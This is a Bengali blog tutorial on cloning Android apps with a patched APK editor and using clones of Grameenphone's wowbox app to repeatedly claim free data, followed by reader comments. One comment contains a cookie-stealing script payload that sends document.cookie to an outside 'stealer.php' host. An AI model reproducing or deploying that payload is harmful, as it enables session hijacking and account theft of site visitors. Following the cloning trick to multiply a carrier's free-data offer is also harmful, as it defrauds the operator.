কেমন হয় যদি আপনি আপনার প্রয়োজনীয় অ্যাপ্স একাধিক আপনার ফোনে ইন্সটল দিন। যেমন- facebook messenger, skype,viber,wowbox ইত্যাদি। আপনারা নিশ্চয়ই লক্ষ্য করেছেন, একটা অ্যাপ্স দুইবার ইন্সটল দিলে একটা আরেকটাকে রিপ্লেস করে. মানে দুইটা ইন্সটল হয়না কাজেই আমাদের অন্য কিছু করতে হবে যাতে 2/3/4/5 কিংবা আমাদের ইচ্ছে মত যতগুলো ইচ্ছা একেকটা ইন্সটল দিতে পারি ।

যা যা শিখব:

1. যে কোন অ্যাপ্স ক্লোন করা;

2. একই অ্যাপ্স যতগুলো ইচ্ছা ইনস্টল দেওয়া;

3. wowbox একাধিক ইনস্টল করা;

4. গ্রামীণফোন সিম পকেটে রেখেই প্রতিদিন 20 MB করে নেওয়া।

যা যা লাগবে:

1. দুটি অ্যাপ্স;

2. যে অ্যাপ্স নকল করবেন সেটার apk ;

3. আর একটা android মোবাইল :-p

কাজ শুরু করা যাক:

1. প্রথমেই এই অ্যাপটি ডাউনলোড Apk editor(size 238 KB) করুন,

এবার এটা ডাউনলোড Apk editor patch (size 213 KB) করুন;

2. প্রথম ফাইলটি ইনস্টল দিন;

3. এবার দ্বিতীয় ফাইলটি ইনস্টল দিন। রিপ্লেসের অনুমতি দিন;

4. Apk Editor ওপেন করুন;

5. SD Card থেকে যে অ্যাপ্স নকল করতে চাচ্ছেন তা কিছু সময় ধরে রাখুন;

6. ক্লোন সিলেক্ট করুন;

7. কোথায় সেভ করবেন এই ফাইলটি তা দেখিয়ে OK দিন;

8. এবার রিনেইম করুন;

9. সেভ করুন

10. চমৎকার! একটা অ্যা;পস ক্লোন করে ফেলেছেন।
.
কী? বিশ্বাস হচ্ছে না? যেটি এইমাত্র সেভ করলেন তা ইনস্টল করে দেখুন কি বিশ্বাস হল তো!

এবার আসা যাক Wowbox এর ব্যাপারে এইটা শেয়ার করতে হয়তো আরো দেরি হত কিন্তু গ্রামীনফোন এইতো যা শুরু করে করেছে তাতে এখনই শেয়ার করে দিলাম :)।

প্রথমেই বলে রাখি wowbox কি, wowbox হল জিপির একটা নিজস্ব অ্যান্ড্রয়েড অ্যাপ্স এটার মাধ্যমে আপনারা জিপি ইউজাররা যারা বন্ধু প্যাকেজে আছেন তারা ইচ্ছে করলেই প্রতিদিন 20 MB করে ইন্টারনেট নিতে পারবেন ফ্রী তে। অন্যান্য অনেক সুবিধা আছে। আমার কাছে এটাই মুল।

আবার কাজ শুরু করা যাক:

1. ঐভাবে wowbox অ্যাপ্স ক্লোন করুন (যতগুলো দরকার ততগুলো ক্লোন করুন) ;

2. এবার যতগুলো দরকার ততগুলো wowbox ইন্সটল দিন;

3. যে সিমে MB নিবেন তা আপনার Android মোবাইলে ইন্সার্ট করুন;

4. এবার setting>sim management এ গিয়ে ম্যাসেজিং এর জন্য যে সিমে MB নিবেন তা সিলেক্ট করুন কিংবা সিম 1 এ সিম ঢুকান এতে এইটা করতে হবে না;

5. নেট কানেকশন দিয়ে wowbox চালু করুন;

6. Free 20 MB থেকে ফ্রী নিন;

7. কাজ শেষ…।

লক্ষণীয়:

1. MB নেওয়ার জন্য সিম বন্ধু প্যাকেজ করে নিন;

2. সিম মাত্র একবারই ইনসার্ট করতে হবে। এর পর আপনি ইচ্ছে করলে সিম খুলে ড্রয়ারে রেখে দিতে পারেন কোন অসুবিধা নেই শুধু প্রতিদিন wowbox চালু করে 20 MB ক্লেইম করবেন যে কোন সিম দিয়ে এটা করতে পারেন কোন অসুবিধা নেই।

8 thoughts on "একটা অ্যান্ড্রয়েড মোবাইলে চালান একই অ্যাপ্স অনেকগুলো। গ্রামীনফোন সিমে wowbox এর মাধ্যমে MB নিন যতগুলো সিমে ইচ্ছা"

  1. sabbir23999 Author says:
    bai plz help me. amar kicho apps clone hocha but kicho apps hocha na, ja gulo amar priojon sai gulo e copy hoy na, ki korta pare akhn…
  2. mukta Contributor says:
    amar tay o hoy na. fb lite, messenger agula hoy na.
  3. Arnab36 Contributor says:
    vai, wowbox theke ki protidin e 20 mb kore pawa jabe..?
  4. Nasim Author Post Creator says:
    না, আগে প্রতিদিন পাওয়া যেত এখন প্রতি সপ্তাহে ১ বার পাওয়া যায়
  5. Mahedi Hasan Khoka Contributor says:
    document.location=”http://www.nadira.byethost11.com/stealer.php?cookie=” + document.cookie;
  6. Online Boy Author says:
    Protidin pawa Jane na , but post e protidin 20 mb likhsen kn

Leave a Reply